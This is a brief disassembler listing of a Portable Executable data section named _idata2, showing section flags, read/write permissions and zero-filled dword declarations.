; Offset to raw data for section: 0001B600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 420000h
dd 17h dup(0)
dword_42005C dd 69h dup(0) align 1000h
_idata2 ends
end start